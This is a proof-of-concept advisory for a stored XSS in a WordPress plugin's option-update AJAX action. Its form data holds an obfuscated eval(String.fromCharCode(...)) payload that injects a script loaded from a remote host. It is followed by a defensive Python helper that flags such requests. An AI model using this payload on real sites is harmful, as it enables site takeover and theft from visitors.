Ultimate Addons for Visual Composer v3.16.10 - Stored XSS / CSRF -> RCE

by WpHutte.com

Notes:

For the XSS you will need to be logged in to the target website, with any role.

For the RCE you will need to be logged in to the target website as Administrator.

Tested on WordPress 4.7.3

Settings:

Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed

The Form

Form Field Name                          POC Data (input field)
action                                   update_ultimate_options
ultimate_smooth_scroll                   enable
ultimate_smooth_scroll_options[speed]    11
ultimate_smooth_scroll_options[step]     11; eval(String.fromCharCode(118,97,114,32,115,32,61,32,100,111,99,117, 109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40, 39,115,99,114,105,112,116,39,41,59,10,115,46,115,114,99,32,61,32,39,104, 116,116,112,115,58,47,47,99,100,110,46,119,112,104,117,116,116,101,46,99, 111,109,47,85,116,105,108,115,47,97,108,101,114,116,46,106,115,39,59,10, 100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110, 100,67,104,105,108,100,40,115,41,59))
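
Added example, not part of the original PoC or the plugin's code: a review helper that flags POST bodies for the update_ultimate_options action whose speed or step value is not a plain integer, which is the shape of the PoC data in the form above. The function and sample names are hypothetical, the sample bodies are constructed, and treating a short plain integer (or an empty value) as the only legitimate input is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Action and field names as listed in the form on this page.
ACTION = "update_ultimate_options"
NUMERIC_FIELDS = (
    "ultimate_smooth_scroll_options[speed]",
    "ultimate_smooth_scroll_options[step]",
)
# Assumption: legitimate speed/step values are short plain integers or empty.
PLAIN_INT = re.compile(r"[0-9]{0,6}")

# Constructed sample bodies (urlencoded, as sent to /wp-admin/admin-ajax.php).
BENIGN = ("action=update_ultimate_options&ultimate_smooth_scroll=enable"
          "&ultimate_smooth_scroll_options%5Bspeed%5D=11"
          "&ultimate_smooth_scroll_options%5Bstep%5D=11")
TAMPERED = ("action=update_ultimate_options&ultimate_smooth_scroll=enable"
            "&ultimate_smooth_scroll_options%5Bspeed%5D=11"
            "&ultimate_smooth_scroll_options%5Bstep%5D=11%3B+constructed_js()")
OTHER_ACTION = "action=heartbeat&ultimate_smooth_scroll_options%5Bstep%5D=abc"


def suspicious_fields(body):
    """Return the numeric option fields in a urlencoded POST body that carry
    anything other than a plain integer. An empty list means nothing to flag."""
    pairs = parse_qsl(body, keep_blank_values=True)
    # Only the plugin's option-update action is of interest here.
    if not any(k == "action" and v == ACTION for k, v in pairs):
        return []
    flagged = []
    for key, value in pairs:
        if key in NUMERIC_FIELDS and not PLAIN_INT.fullmatch(value.strip()):
            if key not in flagged:
                flagged.append(key)
    return flagged


def review(records):
    """records: iterable of (request_id, body). Returns only flagged requests."""
    hits = []
    for request_id, body in records:
        fields = suspicious_fields(body)
        if fields:
            hits.append((request_id, fields))
    return hits


if __name__ == "__main__":
    for hit in review([("r1", BENIGN), ("r2", TAMPERED), ("r3", OTHER_ACTION)]):
        print(hit)
```

The same integer-only rule belongs on the server side where the option is saved; request-body review only shows which saves to look at.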
